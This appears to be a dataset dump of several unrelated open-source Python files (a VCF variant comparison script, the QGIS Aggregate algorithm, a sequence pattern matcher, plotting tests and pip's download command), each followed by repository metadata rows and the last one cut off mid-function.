utils.printf('{:20s}{:>10s}{:>10s}{:>10s}{:>10s}{:>12s}{:>12s}{:>12s}{:>12s}{:>12s}'.format('INDEPENDENT VAR.','MIN','MEDIAN','MEAN','MAX','STD. DEV.','B.COEFF.','As Large', 'As Small', 'P-VALUE'), self.logfile)
for k,v in self.betas.items():
beta = self.model.params[k]
pstats = self.model.pvalues[k]
aslarge = sum([1 for c in v if c >= beta]) / float(len(v))
assmall = sum([1 for c in v if c <= beta]) / float(len(v))
utils.printf('{:20s}{:10f}{:10f}{:10f}{:10f}{:12f}{:12f}{:12f}{:12f}{:12f}'.format(k,min(v),sorted(v)[len(v)/2],sum(v)/len(v),max(v),round(np.std(v),6),beta,aslarge,assmall,round(float(pstats),2)), self.logfile)
def _summary_tvalues(self):
'''
Summary t-values
:return:
'''
utils.printf('', self.logfile)
utils.printf('=== Summary T-Values ===', self.logfile)
utils.printf('{:20s}{:>10s}{:>10s}{:>10s}{:>10s}{:>12s}{:>12s}{:>12s}{:>12s}'.format('INDEPENDENT VAR.','MIN','MEDIAN','MEAN','MAX','STD. DEV.','T-TEST','As Large', 'As Small'), self.logfile)
for k,v in self.tvalues.items():
tstats = self.model.tvalues[k]
aslarge = sum([1 for c in v if c >= tstats]) / float(len(v))
assmall = sum([1 for c in v if c <= tstats]) / float(len(v))
utils.printf('{:20s}{:10f}{:10f}{:10f}{:10f}{:12f}{:12f}{:12f}{:12f}'.format(k,min(v),sorted(v)[len(v)/2],sum(v)/len(v),max(v),round(np.std(v),6),round(float(tstats),2),aslarge,assmall), self.logfile)
def _ttest(self):
utils.printf('')
utils.printf('========== T-TEST ==========')
utils.printf('{:25s} {:25s} {:25s} {:25s}'.format('IND. VAR.','COEF.','T-STAT','P-VALUE'))
ts = {}
lines = {}
for k,vlist in self.betas.items():
t = stats.ttest_1samp(vlist,self.model.params[k])
ts[k] = abs(round(float(t[0]),6))
lines[k] = '{:20s} {:25f} {:25f} {:25f}'.format(k,self.model.params[k],round(float(t[0]),6),round(float(t[1]),6))
ts = utils.sortDictByValue(ts,True)
for t in ts:
utils.printf(lines[t[0]])
#####################################################################################
# Plots
#####################################################################################
def plot(self,coef='betas',fn=None):
'''
Plots frequency of pearson's correlation values
:param coef: string \in {betas, tvalues}
:return:
'''
ncols = 3
m = len(self.betas.keys())
ranges = range(ncols, m, ncols)
i = np.searchsorted(ranges, m, 'left')
nrows = len(ranges)
if i == nrows:
ranges.append((i+1)*ncols)
nrows += 1
fig = plt.figure(figsize=(8,3*i))
for idx,k in enumerate(self.betas.keys()):
plt.subplot(nrows,ncols,idx+1)
if coef == 'betas':
plt.hist(self.betas[k])
elif coef == 'tvalues':
plt.hist(self.tvalues[k])
plt.xlabel('regression coefficients', fontsize=8)
plt.ylabel('frequency', fontsize=8)
plt.title(k)
plt.grid(True)
for ax in fig.get_axes():
ax.tick_params(axis='x', labelsize=5)
ax.tick_params(axis='y', labelsize=5)
plt.tight_layout()
plt.savefig(fn)
plt.close()
| cc0-1.0 | -841,634,498,972,020,200 | 36.864865 | 223 | 0.49536 | false | 3.876859 | true | false | false |
MattWellie/FastqSimulator | excel_out_comparison.py | 1 | 15258 | import cPickle
import os
import re
from openpyxl import load_workbook
import xlsxwriter
__author__ = 'mwelland'
class VCFComparison:
def __init__(self, run_number, variant_dict, vcf_dir):
self.vcf_file = os.path.join(vcf_dir, '{}_anno.vcf.hg19_multianno.vcf'.format(run_number))
self.run_number = run_number
with open(variant_dict, 'r') as handle:
self.variant_dict = cPickle.load(handle)
self.genes = self.variant_dict.keys()
self.vcf = {}
self.results = {}
self.tempvcf = os.path.join(vcf_dir, 'tempout.vcf')
self.matches = 0
self.variants = 0
self.unmatched_predictions = 0
self.excel_dir = 'Excels'
self.mystery_genes = set()
self.transcripts = 0
self.perfect_genes = {'total': 0,
'list': set()}
self.total_observed = 0
def run(self):
self.squish_vcf()
self.open_vcf()
for gene in self.genes:
self.results[gene] = {'found': set(),
'not_found': {'in_vcf': set(),
'in_fq': set()}}
self.check_gene(gene)
os.remove(self.tempvcf)
self.add_missing_variants()
# Print all the output stuff to an excel document
for gene in self.results:
perfect = 0
for section in self.results[gene]['not_found']:
perfect += len(self.results[gene]['not_found'][section])
if perfect == 0:
self.perfect_genes['total'] += 1
self.perfect_genes['list'].add(gene)
self.write_excel()
if self.matches != self.variants:
print 'Total variants counted: {}'.format(self.variants)
print 'Total matches: {}'.format(self.matches)
print 'Predicted and not found:{}'.format(self.unmatched_predictions)
print 'Perfect genes: {}'.format(self.perfect_genes)
else:
print 'All variants found'
def write_excel(self):
# This method will take the results from the process and output to an excel
# There will be a summary page to condense the main details of the comparison
# Each gene will have a further page to describe results in detail
excel_out_name = os.path.join(self.excel_dir, 'run_{}_results.xlsx'.format(self.run_number))
workbook = xlsxwriter.Workbook(excel_out_name)
format_bold = workbook.add_format({'bold': True})
format_matched = workbook.add_format({'bg_color': '#ADFF2F'})
format_missing_db = workbook.add_format({'bg_color': '#F4A460'})
format_missing_excel = workbook.add_format({'bg_color': '#F08080'})
format_hyperlink = workbook.add_format({'font_color': '#0000FF'})
worksheet = workbook.add_worksheet('Summary')
worksheet.set_column(0, 0, 20)
worksheet.set_column(2, 2, 17)
row = 0
col = 0
worksheet.write(row, col, 'Summary Page', format_bold); row =+ 2
worksheet.write(row, 0, 'Genes featured:', format_bold)
worksheet.write(row, 1, '{}'.format(len(self.genes)), format_bold)
row += 1
worksheet.write(row, 0, 'Transcripts featured:', format_bold)
worksheet.write(row, 1, '{}'.format(self.transcripts), format_bold)
row += 1
worksheet.write(row, 0, 'Variants Expected:', format_bold)
worksheet.write(row, 1, '{}'.format(self.variants), format_bold)
row += 1
worksheet.write(row, 0, 'Variants in VCF:', format_bold)
worksheet.write(row, 1, '{}'.format(self.total_observed), format_bold)
row += 1
worksheet.write(row, 0, 'Variants Matched:', format_bold)
worksheet.write(row, 1, '{}'.format(self.matches), format_bold)
row += 1
worksheet.write(row, 0, 'Dodgy Gene names :', format_bold)
worksheet.write(row, 1, '{}'.format(', '.join(self.mystery_genes)), format_bold)
row += 1
worksheet.write(row, 0, 'Perfect genes ({}):'.format(self.perfect_genes['total']), format_bold)
if self.perfect_genes['total'] != 0:
col = 1
for gene in self.perfect_genes['list']:
worksheet.write(row, col, gene, format_bold)
if col == 1:
col += 1
else:
row += 1
col = 1
row += 2
worksheet.write(row, 0, 'Mismatches by Gene:', format_missing_excel)
row += 1
worksheet.write(row, 0, 'Gene', format_bold)
worksheet.write(row, 1, 'FastQ Predictions', format_bold)
worksheet.write(row, 2, 'VCF Results', format_bold)
highest_row = row + 1
for gene in self.results:
worksheet.write(highest_row, 0, """=HYPERLINK("#{0}!A1", "{0}")""".format(gene), format_hyperlink)
fq_row = highest_row
vcf_row = highest_row
if self.results[gene]['not_found']['in_fq']:
for result in self.results[gene]['not_found']['in_fq']:
worksheet.write(fq_row, 1, result); fq_row += 1
fq_row += 1
if self.results[gene]['not_found']['in_vcf']:
for result in self.results[gene]['not_found']['in_vcf']:
worksheet.write(vcf_row, 2, result); vcf_row += 1
vcf_row += 1
if vcf_row > fq_row:
highest_row = vcf_row
else:
highest_row = fq_row
worksheet.set_column(1, 1, 45)
worksheet.set_column(2, 2, 100)
for gene in self.results:
matches = len(self.results[gene]['found'])
mismatches = 0
for section in self.results[gene]['not_found']:
mismatches += len(self.results[gene]['not_found'][section])
total = mismatches + matches
worksheet = workbook.add_worksheet(gene)
worksheet.write(0, 1, """=HYPERLINK("#Summary!A1", "Link To Summary")""", format_hyperlink)
row = 0
col = 0
worksheet.write(row, col, gene, format_bold); row =+ 2
worksheet.write(row, col, 'Total Variants:', format_bold); col += 1
worksheet.write(row, col, '{}'.format(total), format_bold); row += 1; col -= 1
worksheet.write(row, col, 'Matched:', format_bold); col += 1
worksheet.write(row, col, '{}'.format(matches), format_bold); row += 1; col -= 1
worksheet.write(row, col, 'Not Matched:', format_bold); col += 1
worksheet.write(row, col, '{}'.format(mismatches), format_bold); row += 1
row += 2
worksheet.write(row, col, 'Variants Matched:', format_matched)
row += 1
for variant in self.results[gene]['found']:
worksheet.write(row, col, variant, format_matched)
row += 1
row += 2
if self.results[gene]['not_found']['in_vcf'] or self.results[gene]['not_found']['in_fq']:
worksheet.write(row, col, 'Unmatched Variants:', format_missing_excel)
row += 1
if self.results[gene]['not_found']['in_fq']:
worksheet.write(row, col, 'Predicted:', format_missing_excel); row += 1
for variant in self.results[gene]['not_found']['in_fq']:
worksheet.write(row, col, variant, format_missing_excel); row += 1
row += 2
else:
worksheet.write(row, col, 'No Predicted Variants:', format_missing_db); row += 2
if self.results[gene]['not_found']['in_vcf']:
worksheet.write(row, col, 'Unexpected:', format_missing_excel); row += 1
for variant in self.results[gene]['not_found']['in_vcf']:
worksheet.write(row, col, variant, format_missing_excel); row += 1
row += 2
else:
worksheet.write(row, col, 'No Unexpected Variants:', format_missing_db); row += 2
else:
worksheet.write(row, col, 'No Unmatched Variants:', format_missing_db)
worksheet.set_column(0, 0, 15)
worksheet.set_column(1, 1, 50)
workbook.close()
def add_missing_variants(self):
for gene in self.vcf:
for row in self.vcf[gene]:
# Search for specific string in complete row
# RegEx required as columns are not always in order
# GeneDetail.refGene=NM_002506:c.-6897A>G
active_match = 'Unknown Variant'
matched = False
if 'GeneDetail.refGene=.;' in row:
if 'AAChange.refGene=.;' not in row:
a = re.search('AAChange.refGene=.*?:(?P<HGVS>NM_.*?);', row)
b = re.search('AAChange.refGene=(?P<HGVS>NM.*?);', row)
if a:
active_match = a
matched = True
elif b:
active_match = b
matched = True
else:
a = re.search('GeneDetail.refGene=.*?:(?P<HGVS>NM_.*?);', row)
b = re.search('GeneDetail.refGene=(?P<HGVS>NM_.*?);', row)
if a:
active_match = a
matched = True
elif b:
active_match = b
matched = True
if matched:
filtered_list = self.filter_matches(active_match.group('HGVS'), gene)
self.results[gene]['not_found']['in_vcf'].add(', '.join(filtered_list))
else:
if gene in self.results:
self.results[gene]['not_found']['in_vcf'].add('Variant unknown')
else:
self.mystery_genes.add(gene)
def filter_matches(self, string, gene):
output_list = []
for element in string.split(';'):
nm_number = element.split(':')
if nm_number in self.variant_dict[gene].keys():
output_list.append(element)
if not output_list:
output_list.append(string.split(';')[0])
return output_list
def squish_vcf(self):
"""
This mini method just writes out only the non-header information from the original vcf into a new file
The file is written to a new output to make sure that it can be read again if required
The output is written in CSV format so that the csv.DictWriter method can be used
"""
with open(self.vcf_file, 'rU') as input_vcf:
with open(self.tempvcf, 'wb') as output_vcf:
for line in input_vcf:
if line[0] == '#':
pass
else:
output_vcf.write(line)
def open_vcf(self):
"""
Add all contents from the VCF into a dictionary object which can be sorted through by gene
Use regex to capture the gene name, create a dictionary index which is the gene name (if not already an index)
Add the row to a list in the dictionary
Might be best to treat the whole 'INFO' block as a single string, as different variants are annotated in
different columns, depending on whether they are 5'UTR, 3'UTR or exonic...
Ready to begin matching against pickled contents
"""
with open(self.tempvcf) as csvfile:
for row in csvfile:
self.total_observed += 1
search_string = row.split('\t')[7]
match = re.search(';Gene\.refGene=(?P<gene_name>,?.*?);', search_string)
if match:
gene = match.group('gene_name')
if gene in self.vcf:
self.vcf[gene].append(search_string)
else:
self.vcf[gene] = [search_string]
else:
print "couldn't match the variant in %s" % row
def check_gene(self, gene):
rows_to_delete = []
gene_vcf = self.vcf[gene]
rows = range(len(gene_vcf))
for transcript in self.variant_dict[gene]:
self.transcripts += 1
variants = self.variant_dict[gene][transcript]
exons = variants.keys()
for exon in exons:
self.variants += 1
hgvs = variants[exon]['hgvs']
found = False
# If the variant is 3' UTR or 5' UTR, e.g. c.-69A>C:
if hgvs[2] == '-' or hgvs[2] == '*':
# Use the exact sequence predicted to write the gene
variant = '{0}:{1}:{2}'.format(gene, transcript, hgvs)
for row in rows:
match = re.search('({0}:)?{1}:{2}'.format(gene, transcript, hgvs), gene_vcf[row])
if match:
rows_to_delete.append(row)
found = True
self.matches += 1
self.results[gene]['found'].add(variant)
break
else:
# Use the exact sequence predicted to write the gene
variant = '{0}:{1}:exon{2}:{3}'.format(gene, transcript, exon, hgvs)
for row in rows:
match = re.search('({0}:)?{1}:.*?:{2}'.format(gene, transcript, hgvs), gene_vcf[row])
if match:
rows_to_delete.append(row)
found = True
self.matches += 1
self.results[gene]['found'].add(variant)
break
"""
This section will allow matches to be made which are less specific.
This may not be useful if exon numbers are required, but exon numbers
may change between systems more easily than variant nomenclature.
Matching only on nomenclature should be fine for this project.
"""
if not found:
for row in rows:
if hgvs in gene_vcf[row]:
rows_to_delete.append(row)
found = True
self.matches += 1
self.results[gene]['found'].add(variant)
break
if not found:
self.results[gene]['not_found']['in_fq'].add(variant)
self.unmatched_predictions += 1
# Delete any rows which have been matched against
# This is done in reverse, high indexes first
# From low to high would mean the list shrinks and high indexes are invalid
for row in sorted(rows_to_delete, reverse=True):
del gene_vcf[row]
self.vcf[gene] = gene_vcf
| gpl-2.0 | -1,666,488,385,200,868,000 | 45.66055 | 118 | 0.5116 | false | 4.169992 | false | false | false |
telwertowski/QGIS | python/plugins/processing/algs/qgis/Aggregate.py | 15 | 11386 | # -*- coding: utf-8 -*-
"""
***************************************************************************
Aggregate.py
---------------------
Date : February 2017
Copyright : (C) 2017 by Arnaud Morvan
Email : arnaud dot morvan at camptocamp dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Arnaud Morvan'
__date__ = 'February 2017'
__copyright__ = '(C) 2017, Arnaud Morvan'
from qgis.core import (
QgsDistanceArea,
QgsExpression,
QgsExpressionContextUtils,
QgsFeature,
QgsFeatureSink,
QgsField,
QgsFields,
QgsGeometry,
QgsProcessing,
QgsProcessingParameterDefinition,
QgsProcessingParameterExpression,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterFeatureSource,
QgsProcessingException,
QgsProcessingUtils,
QgsWkbTypes,
)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
class Aggregate(QgisAlgorithm):
INPUT = 'INPUT'
GROUP_BY = 'GROUP_BY'
AGGREGATES = 'AGGREGATES'
DISSOLVE = 'DISSOLVE'
OUTPUT = 'OUTPUT'
def group(self):
return self.tr('Vector geometry')
def groupId(self):
return 'vectorgeometry'
def name(self):
return 'aggregate'
def displayName(self):
return self.tr('Aggregate')
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT,
self.tr('Input layer'),
types=[QgsProcessing.TypeVector]))
self.addParameter(QgsProcessingParameterExpression(self.GROUP_BY,
self.tr('Group by expression (NULL to group all features)'),
defaultValue='NULL',
optional=False,
parentLayerParameterName=self.INPUT))
class ParameterAggregates(QgsProcessingParameterDefinition):
def __init__(self, name, description, parentLayerParameterName='INPUT'):
super().__init__(name, description)
self._parentLayerParameter = parentLayerParameterName
def clone(self):
copy = ParameterAggregates(self.name(), self.description(), self._parentLayerParameter)
return copy
def type(self):
return 'aggregates'
def checkValueIsAcceptable(self, value, context=None):
if not isinstance(value, list):
return False
for field_def in value:
if not isinstance(field_def, dict):
return False
if not field_def.get('input', False):
return False
if not field_def.get('aggregate', False):
return False
if not field_def.get('name', False):
return False
if not field_def.get('type', False):
return False
return True
def valueAsPythonString(self, value, context):
return str(value)
def asScriptCode(self):
raise NotImplementedError()
@classmethod
def fromScriptCode(cls, name, description, isOptional, definition):
raise NotImplementedError()
def parentLayerParameter(self):
return self._parentLayerParameter
self.addParameter(ParameterAggregates(self.AGGREGATES,
description=self.tr('Aggregates')))
self.parameterDefinition(self.AGGREGATES).setMetadata({
'widget_wrapper': 'processing.algs.qgis.ui.AggregatesPanel.AggregatesWidgetWrapper'
})
self.addParameter(QgsProcessingParameterFeatureSink(self.OUTPUT,
self.tr('Aggregated')))
def parameterAsAggregates(self, parameters, name, context):
return parameters[name]
def prepareAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
group_by = self.parameterAsExpression(parameters, self.GROUP_BY, context)
aggregates = self.parameterAsAggregates(parameters, self.AGGREGATES, context)
da = QgsDistanceArea()
da.setSourceCrs(source.sourceCrs(), context.transformContext())
da.setEllipsoid(context.project().ellipsoid())
self.source = source
self.group_by = group_by
self.group_by_expr = self.createExpression(group_by, da, context)
self.geometry_expr = self.createExpression('collect($geometry, {})'.format(group_by), da, context)
self.fields = QgsFields()
self.fields_expr = []
for field_def in aggregates:
self.fields.append(QgsField(name=field_def['name'],
type=field_def['type'],
typeName="",
len=field_def['length'],
prec=field_def['precision']))
aggregate = field_def['aggregate']
if aggregate == 'first_value':
expression = field_def['input']
elif aggregate == 'concatenate' or aggregate == 'concatenate_unique':
expression = ('{}({}, {}, {}, \'{}\')'
.format(field_def['aggregate'],
field_def['input'],
group_by,
'TRUE',
field_def['delimiter']))
else:
expression = '{}({}, {})'.format(field_def['aggregate'],
field_def['input'],
group_by)
expr = self.createExpression(expression, da, context)
self.fields_expr.append(expr)
return True
def processAlgorithm(self, parameters, context, feedback):
expr_context = self.createExpressionContext(parameters, context, self.source)
self.group_by_expr.prepare(expr_context)
# Group features in memory layers
source = self.source
count = self.source.featureCount()
if count:
progress_step = 50.0 / count
current = 0
groups = {}
keys = [] # We need deterministic order for the tests
feature = QgsFeature()
for feature in self.source.getFeatures():
expr_context.setFeature(feature)
group_by_value = self.evaluateExpression(self.group_by_expr, expr_context)
# Get an hashable key for the dict
key = group_by_value
if isinstance(key, list):
key = tuple(key)
group = groups.get(key, None)
if group is None:
sink, id = QgsProcessingUtils.createFeatureSink(
'memory:',
context,
source.fields(),
source.wkbType(),
source.sourceCrs())
layer = QgsProcessingUtils.mapLayerFromString(id, context)
group = {
'sink': sink,
'layer': layer,
'feature': feature
}
groups[key] = group
keys.append(key)
group['sink'].addFeature(feature, QgsFeatureSink.FastInsert)
current += 1
feedback.setProgress(int(current * progress_step))
if feedback.isCanceled():
return
(sink, dest_id) = self.parameterAsSink(parameters,
self.OUTPUT,
context,
self.fields,
QgsWkbTypes.multiType(source.wkbType()),
source.sourceCrs())
if sink is None:
raise QgsProcessingException(self.invalidSinkError(parameters, self.OUTPUT))
# Calculate aggregates on memory layers
if len(keys):
progress_step = 50.0 / len(keys)
for current, key in enumerate(keys):
group = groups[key]
expr_context = self.createExpressionContext(parameters, context)
expr_context.appendScope(QgsExpressionContextUtils.layerScope(group['layer']))
expr_context.setFeature(group['feature'])
geometry = self.evaluateExpression(self.geometry_expr, expr_context)
if geometry is not None and not geometry.isEmpty():
geometry = QgsGeometry.unaryUnion(geometry.asGeometryCollection())
if geometry.isEmpty():
raise QgsProcessingException(
'Impossible to combine geometries for {} = {}'
.format(self.group_by, group_by_value))
attrs = []
for fields_expr in self.fields_expr:
attrs.append(self.evaluateExpression(fields_expr, expr_context))
# Write output feature
outFeat = QgsFeature()
if geometry is not None:
outFeat.setGeometry(geometry)
outFeat.setAttributes(attrs)
sink.addFeature(outFeat, QgsFeatureSink.FastInsert)
feedback.setProgress(50 + int(current * progress_step))
if feedback.isCanceled():
return
return {self.OUTPUT: dest_id}
def createExpression(self, text, da, context):
expr = QgsExpression(text)
expr.setGeomCalculator(da)
expr.setDistanceUnits(context.project().distanceUnits())
expr.setAreaUnits(context.project().areaUnits())
if expr.hasParserError():
raise QgsProcessingException(
self.tr(u'Parser error in expression "{}": {}')
.format(text, expr.parserErrorString()))
return expr
def evaluateExpression(self, expr, context):
value = expr.evaluate(context)
if expr.hasEvalError():
raise QgsProcessingException(
self.tr(u'Evaluation error in expression "{}": {}')
.format(expr.expression(), expr.evalErrorString()))
return value
| gpl-2.0 | -4,547,797,799,809,260,000 | 39.810036 | 119 | 0.51739 | false | 5.298278 | false | false | false |
BIO-DIKU/SeqScan | ReferenceSRC/sfm_python.py | 1 | 6471 | #!/usr/bin/python
#####################################
class SequenceUnit:
"""
A pattern unit with a prespecified sequence and, possibly, an allowed number of
mismatches, insertions, and deletions.
"""
def __init__(self, seq, M, I, D):
self.sequence = seq
self.M = M
self.I = I
self.D = D
self.match_set = MatchSet()
def matches(self, seq, pos):
self.match_set.reset(pos)
loose_match(seq, pos, self.sequence, self.M, self.I, self.D, 0, self.match_set)
print self.match_set.end_positions
return len(self.match_set.end_positions) != 0
class RangeUnit:
"""
A pattern unit matching any character sequence with length in a certain a range.
"""
def __init__(self, min_len, max_len):
self.min_len = min_len
self.max_len = max_len
self.match_set = MatchSet()
def matches(self, seq, pos):
self.match_set.reset(pos)
range_match(seq, pos, self.min_len, self.max_len, self.match_set)
return len(self.match_set.end_positions) != 0
class ReferenceUnit:
"""
A pattern unit that extracts previous matches from another "referenced" pattern unit and
attempts to match the sequence of these matches, allowing for a number of mismatches,
insertions and deletions.
"""
def __init__(self, ref_unit, M, I, D, reverse, complement):
self.ref_unit = ref_unit
self.M = M
self.I = I
self.D = D
self.reverse = reverse
self.complement = complement
self.match_set = MatchSet()
def matches(self, seq, pos):
self.match_set.reset(pos)
reference_match(seq, pos, self.ref_unit.match_set, self.M, self.I, self.D,self.reverse, self.complement, self.match_set)
return len(self.match_set.end_positions) != 0
class CompositeUnit:
"""
A pattern that is composed of other pattern units that must match consequtively for the
composite to pass
"""
def __init__(self, units):
self.units = units
self.match_set = MatchSet()
def rest_matches(self, seq, positions, pu_idx):
if pu_idx>=len(self.units):
return True
for pos in positions:
if self.units[pu_idx].matches(seq,pos) and self.rest_matches(seq,self.units[pu_idx].match_set.end_positions, pu_idx+1):
return True
return False
def matches(self, seq, pos):
return self.rest_matches(seq, [pos], 0)
#####################################
class MatchSet:
"""
Represents a set of matches using their common start position and the set of all possible
end-positions. The end-position is the index of the first character that comes after the
match, so e.g. the match starting at 2 with end-position 5 in the sequence "ATCCAG" will be
the sub-sequence "CCA".
"""
def __init__(self, pos=-1):
self.pos = pos
self.end_positions = set([])
def __str__(self):
return "Match["+str(self.pos)+","+str(self.end_positions)+"]"
def reset(self, new_pos):
self.pos = new_pos
self.end_positions.clear()
#####################################
from string import maketrans
complement_table = maketrans("ATUCG","TAAGC")
def nucl_complement(S):
return S.translate(complement_table)[::-1]
def nucl_reverse(S):
return S[::-1]
def reference_match(S,i, match_set, M, I, D, reverse, complement, ret=MatchSet()):
"""
Take the string of a previous match and match it to S, allowing for a number of mismatches,
insertions, and deletions.
S --- The string in which to search for matches
i --- The position in S from which to search
match_set --- The matches of the referenced pattern-unit
M --- The allowed number of mismatches
I --- The allowed number of insertions
D --- The allowed number of deletions
ret --- An accumulating set of matches
"""
if match_set is None: return None
ret.pos = i
for ep in match_set.end_positions:
P = S[match_set.pos:ep]
if reverse: P = nucl_reverse(P)
if complement: P = nucl_complement(P)
loose_match(S,i,P,M,I,D,0,ret)
if ret.end_positions:
return ret
else:
return None
def range_match(S,i, minLen, maxLen, ret=MatchSet(0)):
"""
Match a range to a string given the minimum and maximum length of the range.
S --- The string in which to search for matches
i --- The position in S from which to search
minLen --- The minimum length of the range
maxLen --- The maximum length of the range
ret --- An accumulating set of matches
"""
ret.pos = i
ret.end_positions.update( range(i+minLen, min(i+maxLen+1,len(S))) )
if ret.end_positions:
return ret
else:
return None
def loose_match(S,i,P,M,I,D,j=0, ret=MatchSet(None)):
"""
Match a pattern to a string given an allowed number of mismatches, insertions and deletions.
S --- The string in which to search for matches
i --- The position in S from which to search
P --- The pattern string
M --- The allowed number of mismatches
I --- The allowed number of insertions
D --- The allowed number of deletions
j --- The position in P from which to search
ret --- An accumulating set of matches
"""
if ret.pos is None: ret.pos = i
if j==len(P):
ret.end_positions.add(i)
return ret
if i==len(S):
return None
if I>0: loose_match(S,i+1,P,M, I-1,D, j, ret)
if D>0: loose_match(S,i ,P,M, I, D-1,j+1, ret)
if S[i]==P[j]:
loose_match(S,i+1,P,M,I,D,j+1,ret)
if M>0: loose_match(S,i+1,P,M-1,I, D, j+1, ret)
if not ret.end_positions:
return None
else:
return ret
def scan_for_matches(P, S):
for pos in range(0,len(S)):
if P.matches(S,pos):
print "Full pattern match at position",pos
#p1 = SequenceUnit("ATA",1,0,1)
#p2 = SequenceUnit("AAA",0,0,0)
#P = CompositeUnit([ p1,p2 ])
#S = "AATAAAGAA"
#p1 = SequenceUnit("ATA",0,0,0)
#p2 = RangeUnit(2,5)
#p3 = ReferenceUnit(p1,1,0,0, False, False)
#P = CompositeUnit([ p1,p2,p3 ]) # Corresponds to the SFM pattern "p1=AAG[1,0,0] 2..5 p1"
#S = "AATAAAAGAA"
#p1 = RangeUnit(4,10)
#p2 = RangeUnit(4,4)
#p3 = ReferenceUnit(p1,0,0,0, True, True)
#P = CompositeUnit([p1,p2,p3]) # "p1=4...10 4...4 ~p1"
# scan_for_matches(P, S)
| gpl-2.0 | -5,171,004,589,815,847,000 | 28.958333 | 131 | 0.603462 | false | 3.309974 | false | false | false |
SSGL-SEP/t-sne_cruncher | test/subprocesses/test_subprocess_output.py | 1 | 2385 | from unittest import TestCase, mock
import os
import numpy
from subprocesses.dimensionality_reduction import _get_colors, plot_results
class TestColorMapping(TestCase):
def setUp(self):
self.manhattan = [6, 11, -1, 21, 14]
self.arr = numpy.asarray([[1, 2, 3], [2, 5, 4], [3, 4, -8], [4, 11, 6], [5, 9]])
self.metadata = {"test_tag": {"__filterable": True,
"v1":
{"points": [0, 2, 3],
"color": "#ffffff"},
"v2":
{"points": [1, 4],
"color": "#ff0000"},
}}
def test_color_by_manhattan(self):
res = _get_colors(self.arr)
self.assertSequenceEqual(res, self.manhattan)
def test_color_by_metadata(self):
res = _get_colors(self.arr, self.metadata, "test_tag")
self.assertSequenceEqual(res, [(1.0, 1.0, 1.0),
(1.0, 0.0, 0.0),
(1.0, 1.0, 1.0),
(1.0, 1.0, 1.0),
(1.0, 0.0, 0.0)])
def test_color_missing_metadata(self):
res = _get_colors(self.arr, None, "test_tag")
self.assertSequenceEqual(res, self.manhattan)
def test_color_missing_colorby(self):
res = _get_colors(self.arr, self.metadata)
self.assertSequenceEqual(res, self.manhattan)
class TestPlotOutput(TestCase):
def setUp(self):
self.arr = numpy.asarray([[1, 2, 3], [2, 5, 4], [3, 4, -8], [4, 11, 6], [5, 9]])
@mock.patch("subprocesses.dimensionality_reduction.plt")
def test_plot_results(self, mock_plot):
plot_results(self.arr)
mock_plot.figure.assert_called_with(figsize=(16, 16))
unnamed, named = mock_plot.scatter.call_args
self.assertSequenceEqual(unnamed[0], [1, 2, 3, 4, 5])
self.assertSequenceEqual(unnamed[1], [2, 5, 4, 11, 9])
self.assertSequenceEqual(named["c"], [6, 11, -1, 21, 14])
self.assertEqual(named["s"], 20)
mock_plot.tight_layout.assert_called()
mock_plot.savefig.assert_called_with(os.path.join(os.getcwd(), "prints.png"))
mock_plot.close.assert_called()
| mit | 3,842,694,288,443,195,000 | 39.423729 | 88 | 0.495597 | false | 3.581081 | true | false | false |
xavfernandez/pip | src/pip/_internal/commands/download.py | 7 | 5007 | # The following comment should be removed at some point in the future.
# mypy: disallow-untyped-defs=False
from __future__ import absolute_import
import logging
import os
from pip._internal.cli import cmdoptions
from pip._internal.cli.cmdoptions import make_target_python
from pip._internal.cli.req_command import RequirementCommand
from pip._internal.req import RequirementSet
from pip._internal.req.req_tracker import get_requirement_tracker
from pip._internal.utils.misc import ensure_dir, normalize_path, write_output
from pip._internal.utils.temp_dir import TempDirectory
logger = logging.getLogger(__name__)
class DownloadCommand(RequirementCommand):
"""
Download packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports downloading from "requirements files", which provide
an easy way to specify a whole environment to be downloaded.
"""
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] <vcs project url> ...
%prog [options] <local project path> ...
%prog [options] <archive url/path> ..."""
def __init__(self, *args, **kw):
super(DownloadCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.global_options())
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(cmdoptions.prefer_binary())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(cmdoptions.pre())
cmd_opts.add_option(cmdoptions.no_clean())
cmd_opts.add_option(cmdoptions.require_hashes())
cmd_opts.add_option(cmdoptions.progress_bar())
cmd_opts.add_option(cmdoptions.no_build_isolation())
cmd_opts.add_option(cmdoptions.use_pep517())
cmd_opts.add_option(cmdoptions.no_use_pep517())
cmd_opts.add_option(
'-d', '--dest', '--destination-dir', '--destination-directory',
dest='download_dir',
metavar='dir',
default=os.curdir,
help=("Download packages into <dir>."),
)
cmdoptions.add_target_python_options(cmd_opts)
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
options.ignore_installed = True
# editable doesn't really make sense for `pip download`, but the bowels
# of the RequirementSet code require that property.
options.editables = []
cmdoptions.check_dist_restriction(options)
options.download_dir = normalize_path(options.download_dir)
ensure_dir(options.download_dir)
session = self.get_default_session(options)
target_python = make_target_python(options)
finder = self._build_package_finder(
options=options,
session=session,
target_python=target_python,
)
build_delete = (not (options.no_clean or options.build_dir))
with get_requirement_tracker() as req_tracker, TempDirectory(
options.build_dir, delete=build_delete, kind="download"
) as directory:
requirement_set = RequirementSet()
self.populate_requirement_set(
requirement_set,
args,
options,
finder,
session,
None
